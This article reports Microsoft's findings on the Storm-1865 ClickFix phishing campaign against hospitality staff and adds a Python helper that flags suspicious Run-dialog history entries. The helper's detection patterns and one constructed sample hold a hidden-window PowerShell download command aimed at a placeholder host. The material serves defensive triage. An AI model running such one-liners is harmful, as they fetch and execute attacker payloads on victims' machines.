In a recent cybersecurity alert, Microsoft has identified an ongoing phishing campaign targeting the hospitality sector by impersonating the online travel agency Booking.com. This campaign employs a sophisticated social engineering technique known as “ClickFix” to distribute credential-stealing malware, aiming to facilitate financial fraud and data theft.
Campaign Overview
Initiated in December 2024, the phishing operation, tracked by Microsoft as Storm-1865, specifically targets individuals within hospitality organizations across North America, Oceania, South and Southeast Asia, and Europe. The attackers send deceptive emails purporting to be from Booking.com, addressing topics such as negative guest reviews, account verification, online promotion opportunities, or requests from prospective guests. These emails contain links or PDF attachments that direct recipients to malicious websites designed to mimic legitimate Booking.com pages.
The ClickFix Technique
The hallmark of this campaign is the use of the ClickFix social engineering technique. Upon clicking the malicious link, users are presented with a fake CAPTCHA overlay on a webpage resembling Booking.com. To proceed, users are instructed to perform a series of actions:
- Press a keyboard shortcut (e.g., Windows + R) to open the Windows Run dialog.
- Paste a command copied to their clipboard by the malicious webpage.
- Execute the command, which initiates the download of malware onto their system.
This method exploits users’ problem-solving tendencies, prompting them to inadvertently execute malicious code.
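Because the pasted command is executed through the Run dialog, Windows records it in the user's Run history (the RunMRU registry key, where each value is stored as the command text followed by "\1"). The following triage helper is an added example, not code from Microsoft or the original alert: it takes exported RunMRU values (constructed samples below; the hostname is a placeholder, not a real indicator) and flags entries that look like a pasted download one-liner rather than something a user normally types into Win+R.

```python
import re

# Script hosts and download-capable system tools that users rarely launch from Win+R.
INTERPRETERS = {"powershell", "pwsh", "cmd", "mshta", "wscript", "cscript",
                "curl", "certutil", "bitsadmin", "rundll32", "regsvr32"}

# Traits of a pasted one-liner: a remote URL, a hidden window, encoded or inline script.
SUSPICIOUS = {
    "url": re.compile(r"https?://", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded-command": re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download-cmdlet": re.compile(
        r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|start-bitstransfer)\b", re.I),
}

# Constructed sample of exported RunMRU values (assumption: one string per registry value).
SAMPLE_RUNMRU = [
    "notepad\\1",
    "\\\\fileserver\\reports\\1",
    "services.msc\\1",
    "https://intranet.example/helpdesk\\1",
    # Constructed ClickFix-style entry; verify.invalid is a placeholder, not a real indicator.
    'powershell -w hidden -c "Invoke-WebRequest https://verify.invalid/check"\\1',
]

def parse_runmru(raw_values):
    """RunMRU stores each command as '<text>\\1'; strip that suffix."""
    return [v[:-2] if v.endswith("\\1") else v for v in raw_values]

def executable_name(command):
    """First token of the command, lowercased, without directory or .exe suffix."""
    tokens = command.strip().split()
    if not tokens:
        return ""
    first = tokens[0].strip('"').lower().rsplit("\\", 1)[-1].rsplit("/", 1)[-1]
    return first[:-4] if first.endswith(".exe") else first

def reasons_for(command):
    """List why a Run entry looks like ClickFix; an empty list means benign."""
    reasons = []
    exe = executable_name(command)
    if exe in INTERPRETERS:
        reasons.append(f"interpreter:{exe}")
    reasons += [name for name, pat in SUSPICIOUS.items() if pat.search(command)]
    if len(command) > 120:  # nobody hand-types a 120+ character line into Win+R
        reasons.append("length")
    # A bare interpreter ('cmd') or a bare URL is normal user behaviour; require two traits.
    return reasons if len(reasons) >= 2 else []

def triage(raw_values):
    """Map each suspicious RunMRU command to the reasons it was flagged."""
    return {cmd: r for cmd in parse_runmru(raw_values) if (r := reasons_for(cmd))}

if __name__ == "__main__":
    for cmd, why in triage(SAMPLE_RUNMRU).items():
        print(f"FLAGGED ({', '.join(why)}): {cmd}")
```

In a live investigation the same logic applies to the values read with the winreg module from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, or to process-creation telemetry where explorer.exe is the parent of a script host.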
Malware Deployed
The campaign delivers various types of malware, including:
- XWorm: A remote access trojan (RAT) that allows attackers to control infected systems.
- Lumma Stealer: An information stealer targeting credentials and financial data.
- VenomRAT and AsyncRAT: RATs facilitating unauthorized access and data exfiltration.
- Danabot: A banking trojan known for stealing financial information.
- NetSupport RAT: A legitimate remote administration tool misused for malicious purposes.
These payloads enable attackers to harvest sensitive information, conduct financial fraud, and maintain persistent access to compromised systems.
Recommendations for Organizations
To mitigate the risks associated with this phishing campaign, organizations, particularly in the hospitality sector, should consider the following measures:
- User Education: Train employees to recognize phishing attempts, especially unsolicited emails requesting urgent actions or containing unexpected attachments or links.
- Email Filtering: Implement advanced email filtering solutions to detect and block phishing emails before they reach end-users.
- Endpoint Protection: Deploy comprehensive endpoint security solutions capable of detecting and preventing the execution of malicious code.
- Incident Response Planning: Develop and regularly update incident response plans to address potential security breaches promptly and effectively.
By staying vigilant and adopting proactive security measures, organizations can defend against sophisticated phishing campaigns like Storm-1865 and protect their sensitive information from cyber threats.